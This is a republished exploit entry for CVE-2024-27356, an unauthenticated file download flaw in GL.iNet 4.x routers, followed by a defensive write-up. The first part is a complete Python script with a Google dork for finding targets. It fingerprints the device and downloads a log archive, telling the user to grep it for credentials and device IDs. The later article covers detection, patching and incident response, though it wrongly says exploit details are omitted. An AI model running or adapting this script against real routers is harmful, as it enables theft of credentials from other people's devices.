GL-iNet MT6000 4.5.5 - Arbitrary File Download

Exploit Author: Bandar Alharbi Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2024-04-02

# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
# CVE: CVE-2024-27356
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: 2/26/2024
# Exploit Author: Bandar Alharbi (aggressor)
# Vendor Homepage: www.gl-inet.com
# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
# Tested Model: GL-X3000 Spitz AX
# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md

import sys
import requests
import json
requests.packages.urllib3.disable_warnings()
h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}

def DoesTarExist():
    r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
    if r.status_code == 200:
        f = open("logread.tar", "wb")
        f.write(r.content)
        f.close()
        print("[*] Full logs archive `logread.tar` has been downloaded!")
        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
        return True
    else:
        print("[*] The `logread.tar` archive does not exist however ... try again later!")
        return False

def isVulnerable():
    r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
    if r1.status_code == 500 and "nginx" in r1.text:
        r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
        if  "Admin-Token" in r2.text:
            j  = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
            r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
            ver = r3.json()['result']['firmware_version']
            model = r3.json()['result']['model']
            if ver.startswith(('4.')):
                print("[*] Firmware version (%s) is vulnerable!" %ver)
                print("[*] Device model is: %s" %model)
                return True
    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
    return False

def isAlive():
    try:
        r = requests.get(url, verify=False, timeout=30, headers=h)
        if r.status_code != 200:
            print("[*] Make sure the target's web interface is accessible!")
            return False
        elif r.status_code == 200:
            print("[*] The target is reachable!")
            return True
    except Exception:
        print("[*] Error occurred when connecting to the target!")
        pass
    return False

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("exploit.py url")
        sys.exit(0)
    url = sys.argv[1]
    url = url.lower()
    if not url.startswith(('http://', 'https://')):
        print("[*] Invalid url format! It should be http[s]://<domain or ip>")
        sys.exit(0)
    if url.endswith("/"):
        url = url.rstrip("/")

    print("[*] GL.iNet Unauthenticated Full Logs Downloader")

    try:
        if (isAlive() and isVulnerable()) == (True and True):
            DoesTarExist()
    except KeyboardInterrupt:
        print("[*] The exploit has been stopped by the user!")
        sys.exit(0)

GL‑iNet MT6000 / GL‑X3000 (firmware 4.x) — Arbitrary File Download (CVE‑2024‑27356): Analysis, Impact, and Mitigation

This article provides a technical but non‑actionable overview of CVE‑2024‑27356 — an unauthenticated arbitrary file download vulnerability affecting certain GL‑iNet routers running the 4.x firmware line (reported in early 2024). It focuses on what the flaw means, who is affected, how defenders can detect abuse, and practical remediation and hardening guidance for organizations and home users. This content is written for security practitioners, administrators, and auditors; exploit details and step‑by‑step attack instructions are intentionally omitted.

Executive summary

Vulnerability type: Unauthenticated arbitrary file download / information disclosure.
Impact: Confidential files (including system logs, credentials and device identifiers) may be retrievable without authentication, exposing sensitive configuration and secrets.
Affected products: Multiple GL‑iNet models running firmware in the 4.x series (vendor advisory should be consulted for exact model/firmware mapping).
Mitigation: Apply vendor updates/patches, restrict administrative interfaces, rotate exposed credentials, and follow network segmentation and monitoring best practices.

What this vulnerability means (non‑technical explanation)

The vulnerability allows an unauthenticated user who can reach the device's web management interface to download files that should not be publicly available. Those files may contain logs, configuration snippets, and possibly plaintext credentials or tokens. Because no authentication is required, an attacker who can reach the device over the network (locally or via exposed management ports) can harvest sensitive information and use it as a foothold for further compromise.

Technical overview (high‑level)

The flaw is an information disclosure/arbitrary file retrieval issue in the router web stack that exposes server‑side file resources to unauthenticated HTTP(S) requests under certain firmware versions.
The exposure often manifests as accessible archives or log files that aggregate system and service output. Those artifacts commonly contain debug information, device identifiers, and other secrets.
Because the issue is unauthenticated, simply being able to establish an HTTP(S) connection to the device's management interface is sufficient for exploitation.

Affected products and versions

Vendor advisories and coordinated disclosures list several GL‑iNet devices running 4.x firmware as impacted. Exact model/firmware mappings can change as vendors issue patches or clarifications. Always consult the GL‑iNet security advisory or firmware release notes for the authoritative list and patched firmware versions.

Vendor	Product family / models	Firmware series
GL‑iNet	GL‑X3000 (Spitz AX) and other 4.x series devices	4.x (see vendor advisory)

Realistic impact and use cases

Information disclosure: Attackers can retrieve logs and files containing usernames, device IDs, API tokens, or network topology details.
Credential harvesting: Exposed configuration files may reveal SSH keys or admin credentials that enable remote takeover.
Pivoting and reconnaissance: Retrieved configuration can reveal upstream VPN credentials, cloud integrations, or lateral‑movement opportunities.
Privacy risk: Logs may contain personally identifiable information (PII) or session data tied to users of the device.

Detection and indicators of compromise (defensive guidance)

Focus on detecting anomalous access patterns to management interfaces and signs of file enumeration/download activity. Suggested detection approaches:

Network monitoring: Alert on HTTP(S) GET/POST requests to device admin interfaces originating from unexpected networks or external IPs.
Access logs: Search web server or gateway logs for requests that return large binary responses or archive‑style responses (unusually large content length for admin endpoints).
SIEM rules: Create rules that flag:
- Connections to router admin pages from external IPs
- High‑volume GET requests to a single management host
- Events that show file download content types (application/x‑tar, application/octet‑stream) from admin paths
Endpoint checks: On managed devices, verify that log archive files are not stored in publicly accessible web directories and inspect system logs for unexpected file reads.
Inventory verification: Maintain an accurate inventory of devices and firmware versions and cross‑reference it against vendor advisories.

Safe example: How to check firmware version (non‑exploit pseudocode)

# Pseudocode (defensive only) - check a device's reported firmware version
# Run this only against devices you own or are authorized to test.

import requests

def get_firmware_version(base_url, timeout=10):
    # Query a benign, documented status endpoint or management page that reports firmware version.
    # DO NOT issue requests to undocumented endpoints or attempt to download files.
    r = requests.get(f"{base_url}/status", timeout=timeout, verify=True)
    if r.status_code == 200:
        data = r.json()    # or parse HTML if the status is presented on a page
        return data.get("firmware_version")
    return None

# Example usage
version = get_firmware_version("https://router.example.local")
if version:
    print("Firmware version:", version)
else:
    print("Unable to determine firmware version.")

Explanation: The pseudocode above demonstrates a defensive approach for obtaining an innocuous firmware version field from a documented status endpoint. It avoids referencing any undocumented or sensitive endpoints and is intended for inventory and patch verification tasks only. Always use vendor‑documented management APIs or the official web UI when checking firmware information.

Mitigation and remediation

Update firmware: Install the vendor's security patch or updated firmware as soon as it is available. This is the primary remediation step.
Limit administrative exposure: Disable remote (WAN‑side) access to the device management interface. Permit web admin access only from trusted internal networks or via an administrative VPN.
Network segmentation: Place consumer or small‑office routers on segregated management VLANs; avoid placing management interfaces on networks with general user traffic.
Rotate credentials and keys: If you suspect the device may have been accessed, rotate administrative passwords, API tokens, and any embedded keys or VPN credentials that may have been exposed.
Harden configuration: Disable unnecessary services (e.g., remote logging to public buckets, debug archives) and enable logging/alerting for admin events.
Access control & firewalling: Use firewall rules to restrict HTTP(S) access to device management ports to specific IPs and ranges.

Incident response checklist

Isolate affected devices from networks exposing management interfaces externally.
Collect forensic artifacts: preserved web server logs, syslogs, and file system snapshots for the device (if practicable and safe to do so).
Search for signs of credential reuse (logins that used the same credentials elsewhere) and rotate those credentials.
If sensitive keys or credentials were exposed, assume compromise and rotate or revoke them.
Apply updates and reconfigure device according to vendor guidance; monitor for signs of reinfection or repeated exploitation.

Best practices to reduce exposure to similar vulnerabilities

Maintain an up‑to‑date asset inventory (device model, firmware, exposure level).
Automate firmware checks and patching where possible, especially for devices on remote sites.
Restrict management plane access by default (deny‑by‑default firewall posture).
Use multi‑factor authentication for device management where supported.
Regularly audit configuration backups and stored logs for sensitive content that should not be publicly accessible.

Responsible disclosure and resources

For definitive guidance, consult the official GL‑iNet security advisory and firmware release notes. If you discover a suspected compromise or vulnerability in your environment, follow your organization’s incident response procedures, and report confirmed security issues to the vendor through their official channels. Avoid attempting to exploit or reproduce vulnerabilities on devices you do not own or without explicit authorization.

References and further reading

GL‑iNet official site and firmware release notes — consult vendor for patched firmware and advisories.
Security best practice guides for embedded devices and router management.
Network segmentation, firewalling, and secure remote management documentation from reputable sources.